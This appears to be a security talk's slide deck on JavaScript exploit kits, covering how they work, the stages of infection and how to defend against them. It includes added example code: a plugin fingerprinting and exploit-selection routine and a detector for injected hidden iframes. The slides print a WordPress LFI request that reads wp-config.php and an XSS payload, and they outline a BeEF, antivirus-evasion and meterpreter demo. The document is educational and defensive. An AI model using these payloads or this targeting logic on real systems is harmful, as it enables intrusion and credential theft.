Javascript Exploitation
Exploit Kits – Exploitation via JS
Rashid Feroz & Krishnendu Paul
About us!
• Information security enthusiasts.
• Love to break into things!
• A college grad and an Industry veteran.
What Are Exploit Kits?
• A toolkit that automates the exploitation of client-side vulnerabilities.
• Usually targets browsers and programs that a website can invoke through the browser.
• The attacker doesn’t need to know how to create exploits to benefit from infecting systems.
• It provides a user-friendly web interface that helps the attacker track the infection campaign.
Famous Exploit Kits
• Blackhole
• FlashPack
• Magnitude
• Rig
• Nuclear
• Angler
• Sweet Orange
• Neutrino
Exploit Kit distribution
Most commonly used vulnerable 3rd party software
• Oracle Java Runtime environment
• Adobe Acrobat Reader
• Adobe Flash Player / Plugin
• Apple Quicktime
From sale to infection
• The buyer licenses a copy of the kit from its creator.
• The victim clicks a link in a spam email or loads a compromised web page.
• The page contains JavaScript that fingerprints the victim’s browser and plugins (names and versions), works out which known vulnerabilities are present, and reports the result back to the kit’s control panel.
• If the kit finds a usable exploit, it serves it and the malicious payload is dropped onto the victim’s computer.
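The fingerprinting step in the chain above, as an added example that is not part of the original slides or of any real kit: it runs against a constructed `navigator`-like object so it works offline in node, the plugin names and description strings only mimic the legacy `navigator.plugins` format for the four products the deck lists, and the version thresholds and payload labels in `RULES` are placeholders, not real vulnerability boundaries.

```javascript
// Added example (not from the slides): how a landing page fingerprints a visitor
// and picks a payload. Constructed navigator objects; placeholder thresholds.

// Constructed: what navigator looked like on an unpatched desktop browser.
const SAMPLE_NAVIGATOR = {
  userAgent: 'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0',
  plugins: [
    { name: 'Shockwave Flash', description: 'Shockwave Flash 11.2 r202' },
    { name: 'Java(TM) Platform SE 7 U51',
      description: 'Next Generation Java Plug-in 10.51.2 for Mozilla browsers' },
    { name: 'Adobe Acrobat',
      description: 'Adobe PDF Plug-In For Firefox and Netscape 11.0.07' },
    { name: 'QuickTime Plug-in 7.7.4',
      description: 'The QuickTime Plugin allows you to view multimedia content.' },
  ],
};

// Constructed: the same machine after patching (newer version of every plugin).
const PATCHED_NAVIGATOR = {
  userAgent: 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',
  plugins: [
    { name: 'Shockwave Flash', description: 'Shockwave Flash 32.0 r0' },
    { name: 'Java(TM) Platform SE 8 U201',
      description: 'Next Generation Java Plug-in 11.201.2 for Mozilla browsers' },
    { name: 'Adobe Acrobat',
      description: 'Adobe PDF Plug-In For Firefox and Netscape 11.0.23' },
    { name: 'QuickTime Plug-in 7.7.9', description: 'QuickTime Plugin.' },
  ],
};

// How the deck's four "most targeted" products show up in navigator.plugins.
const TARGETS = {
  flash: /Shockwave Flash/i,
  java: /\bJava\b/i,
  reader: /Adobe (?:Acrobat|Reader|PDF)/i,
  quicktime: /QuickTime/i,
};

// First dotted number in a string: "Shockwave Flash 11.2 r202" -> [11, 2].
function parseVersion(str) {
  const m = /(\d+(?:\.\d+)*)/.exec(str || '');
  return m ? m[1].split('.').map(Number) : null;
}

// Numeric comparison of version arrays; missing components count as 0.
// Returns < 0 if a is older than b, 0 if equal, > 0 if newer.
function compareVersion(a, b) {
  const n = Math.max(a.length, b.length);
  for (let i = 0; i < n; i++) {
    const d = (a[i] || 0) - (b[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Landing-page step 1: enumerate plugins and the UA, returning a map such as
// { flash: [11, 2], java: [10, 51, 2], ..., firefox: [24, 0] }.
function fingerprint(nav) {
  const found = {};
  for (const p of nav.plugins || []) {
    for (const [key, re] of Object.entries(TARGETS)) {
      if (found[key]) continue;
      if (re.test(p.name) || re.test(p.description)) {
        // The description usually carries the precise version; fall back to the name.
        const v = parseVersion(p.description) || parseVersion(p.name);
        if (v) found[key] = v;
      }
    }
  }
  const browsers = {
    firefox: /Firefox\/(\d+(?:\.\d+)*)/,
    msie: /(?:MSIE |Trident\/.*rv:)(\d+(?:\.\d+)*)/,
    chrome: /Chrome\/(\d+(?:\.\d+)*)/,
  };
  for (const [key, re] of Object.entries(browsers)) {
    const m = re.exec(nav.userAgent || '');
    if (m) { found[key] = parseVersion(m[1]); break; }
  }
  return found;
}

// Landing-page step 2: ordered targeting rules. The kit serves the first payload
// whose software is present and older than the threshold; a fully patched visitor
// gets null (kits typically show a blank page). PLACEHOLDER thresholds and labels.
const RULES = [
  { software: 'flash', below: [13], payload: 'flash_swf_exploit' },
  { software: 'java', below: [10, 60], payload: 'java_applet_exploit' },
  { software: 'reader', below: [11, 0, 10], payload: 'pdf_exploit' },
  { software: 'quicktime', below: [7, 7, 5], payload: 'quicktime_exploit' },
];

function chooseExploit(found, rules = RULES) {
  for (const r of rules) {
    const v = found[r.software];
    if (v && compareVersion(v, r.below) < 0) return r.payload;
  }
  return null;
}

// Stand-alone run: fingerprint and decision for both constructed visitors.
for (const [label, nav] of [['unpatched', SAMPLE_NAVIGATOR], ['patched', PATCHED_NAVIGATOR]]) {
  const fp = fingerprint(nav);
  console.log(label, JSON.stringify(fp), '->', chooseExploit(fp));
}
```

The same `fingerprint()` routine is useful defensively: pasted into a browser console as `fingerprint(navigator)` it shows exactly what a landing page would learn, and a browser with the legacy plugins removed or kept current gives `chooseExploit()` nothing to match, which is the end state the "How to stay safe?" slide is aiming for.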
Phases
• Compromised site
• Redirector
• Landing page
• Post-infection traffic
Compromised sites
• LFI (directory traversal that reads wp-config.php) in the RevSlider plugin for WordPress:
– http://[compromised.com]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
• XSS in the Simple Security plugin for WordPress:
– http://[compromised.com]/wp-admin/users.php?page=access_log&datefilter=%27%22%3E%3Cscript%3Ealert%28/HACKED/%29;%3C/script%3E
• Drupal SQL injection
• CDN reference compromise (e.g. Operation Poisoned Helmand)
• Iframe injectors
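A detector for the iframe-injector vector listed last, as an added example that is not part of the original slides: it scans raw HTML for frames that are both hidden and off-site, and also decodes the percent-encoded `document.write(unescape(...))` form injectors commonly use so the frame never appears literally in the page source. It runs offline in node; the sample page and all `.example` hostnames are constructed.

```javascript
// Added example (not from the slides): scan HTML for injected hidden iframes,
// literal or hidden behind document.write(unescape('%3Ciframe...')).

// Constructed page: one legitimate embed, one injected 1x1 redirector frame, and
// one obfuscated injection that decodes to an off-screen frame for a landing page.
const SAMPLE_PAGE = `
<html><head><title>Example blog</title></head><body>
<p>Welcome to the blog.</p>
<iframe src="https://videohost.example/embed/42" width="560" height="315"></iframe>
<iframe src="http://redirector.example/go.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Flanding.example%2Fin.php%22%20style%3D%22position%3Aabsolute%3Bleft%3A-9999px%22%3E%3C%2Fiframe%3E'))</script>
</body></html>`;

// Parse the attributes of one tag string into {name: value}, names lower-cased.
function parseAttrs(tag) {
  const attrs = {};
  const re = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(tag))) {
    attrs[m[1].toLowerCase()] = m[2] !== undefined ? m[2] : (m[3] !== undefined ? m[3] : m[4]);
  }
  return attrs;
}

// Hostname of an absolute URL, or null for relative or invalid ones.
function hostOf(url) {
  try { return new URL(url).hostname; } catch (e) { return null; }
}

// Visual-hiding tricks injected frames rely on: 0/1-pixel size, display:none,
// visibility:hidden, or a position far off-screen.
function isHidden(attrs) {
  const w = parseInt(attrs.width, 10);
  const h = parseInt(attrs.height, 10);
  const style = (attrs.style || '').replace(/\s+/g, '').toLowerCase();
  return (!Number.isNaN(w) && w <= 1) || (!Number.isNaN(h) && h <= 1) ||
    style.includes('display:none') || style.includes('visibility:hidden') ||
    /(?:left|top):-\d{3,}/.test(style);
}

// Report iframes that are both hidden and off-site. A visible third-party embed
// or a hidden same-origin frame is not reported. Percent-encoded
// document.write(unescape(...)) payloads are decoded and rescanned (bounded depth).
function scanForInjectedIframes(html, pageHost, depth = 0) {
  const findings = [];
  const iframeRe = /<iframe\b[^>]*>/gi;
  let m;
  while ((m = iframeRe.exec(html))) {
    const a = parseAttrs(m[0]);
    const host = hostOf(a.src || '');
    if (host && host !== pageHost && isHidden(a)) {
      findings.push({ kind: 'hidden-offsite-iframe', src: a.src, offset: m.index });
    }
  }
  if (depth >= 2) return findings;
  const writeRe = /document\.write\s*\(\s*unescape\s*\(\s*(['"])((?:%[0-9a-fA-F]{2}|[^'"])*)\1\s*\)\s*\)/g;
  while ((m = writeRe.exec(html))) {
    // unescape() is the legacy decoder the injector itself uses (%XX and %uXXXX).
    const decoded = unescape(m[2]);
    for (const f of scanForInjectedIframes(decoded, pageHost, depth + 1)) {
      findings.push({ ...f, kind: 'obfuscated-' + f.kind, offset: m.index });
    }
  }
  return findings;
}

// Stand-alone run over the constructed page.
console.log(JSON.stringify(scanForInjectedIframes(SAMPLE_PAGE, 'blog.example'), null, 2));
```

The two heuristics are deliberately combined: flagging every off-site iframe would drown an analyst in legitimate embeds, and flagging every hidden frame would hit same-origin tracking or layout frames, while an injector needs both properties at once to reach the redirector unnoticed.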
Demo time
• BeEF framework (JS hook)
• Payload delivery via social engineering
• Antivirus evasion (FUD)
• Get a meterpreter shell back
• Virus scan results
How to stay safe?
• Stay up to date with security patches on your desktop machine.
• Several specialized tools identify missing patches, install them, and verify that they applied; use such a patch-management utility so your system is updated continuously rather than occasionally.
• Make sure that your browser, operating system, and browser plugins are all up to date, and remove plugins you do not need: the kits above fingerprint exactly those plugins (Java, Reader, Flash, QuickTime) before choosing an exploit.
• Install a good host-based intrusion prevention system (HIPS) to monitor for suspicious activity on your computer.
Thanks